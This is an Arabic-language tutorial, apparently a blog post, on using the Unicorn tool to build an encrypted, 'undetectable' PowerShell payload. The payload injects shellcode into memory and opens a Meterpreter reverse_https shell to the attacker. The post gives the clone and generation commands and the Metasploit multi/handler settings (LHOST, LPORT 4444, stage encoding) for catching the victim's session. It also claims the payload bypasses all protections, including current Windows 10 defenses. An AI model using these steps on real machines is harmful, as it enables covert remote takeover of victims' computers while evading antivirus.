عمل بايلود غير قابل للكشف - Unicorn

عمل بايلود مشفر غير قابل للكشف

 

ماهي أداة Unicorn ؟


تم إنشاؤها بواسطة TrustedSec , هي أداة بسيطة مصممة للمساعدة في اختبار الاختراق وعمل هجمات powershell  وحقن البايلود shellcode الذي ينشىئ أتصال بينك وبين الضحية يعرف بكود برمجي يستخدم كبايلود مباشرة في الذاكرة



عمل بايلود غير قابل للكشف - Unicorn

سنتعرف علي كيفية انشاء بايلود مشفر باستخدام أداة Unicorn وتخطي جميع الحمايات وأيضا تخطي حمايات وندوز 10 باخر اصداراته 



تحميل اداة unicorn

 
لتحميل أداة unicorn استخدم الامر التالي

git clone https://github.com/trustedsec/unicorn

بعد تحميل الاداة اذهب الى المسار
cd unicorn

او المكان الذي تم تحميل الأداه فيه 

لأظهار الخيارات والاوصاف لكل هجوم استخدم الامر التالي
unicorn.py --help/.

انشاء البايلود

 
لانشاء البايلود أستخدم الامر التالي :

unicorn.py windows/meterpreter/reverse_https "your ip" "port/.

ستستخدم الااداة unicorn ميتاسبليوت موديل reverse_https للهجوم


عمل بايلود غير قابل للكشف - Unicorn




عند توليد البايلود سوف يظهر ملفين الاول powershell_attack.txt والذي سوف يتم تنفيذه بجهاز الضحية والملف الثاني unicorn.rc وهو يحتوي على الاعدادات التي سوف يتم ادخالها في الميتاسبلويت



اوامر الميتاسبلويت 

 
تشغيل ميتاسبلويت بكتابة الامر msfconsole 
بعد تشغيل الاداة ادخل الاوامر التالية

use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST your ip
set LPORT 4444
set ExitOnSession false
set EnableStageEncoding true
exploit 
عمل بايلود غير قابل للكشف - Unicorn
شارك الموضوع
تعليقات

إرسال تعليق